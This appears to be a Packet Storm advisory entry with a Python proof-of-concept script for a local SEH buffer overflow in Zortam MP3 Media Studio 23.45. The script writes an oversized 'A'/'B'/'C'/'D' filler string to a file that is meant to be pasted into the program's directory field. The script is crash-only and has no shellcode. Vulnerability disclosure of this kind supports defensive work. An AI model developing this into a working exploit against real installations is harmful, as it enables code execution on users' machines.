Zortam MP3 Media Studio version 23.45 suffers from a local buffer overflow vulnerability.
772ce4e60aa34cc31b6b092cfbe3df07f71513456777922a54194354a00b364b#!/usr/bin/python
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.zortam.com/
# Version: 23.45
# Tested on: Windows 7 32 bit
# Date: 12/04/2018
# Vendor did not respond to advisory
# File > Add Disk to Mp3 Library > paste string from zortamPOC.txt into directory field
filename="zortamPOC.txt"
junk = "A" * 268
nseh = "B" * 4
seh="C" * 4
fill = "D" *900
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed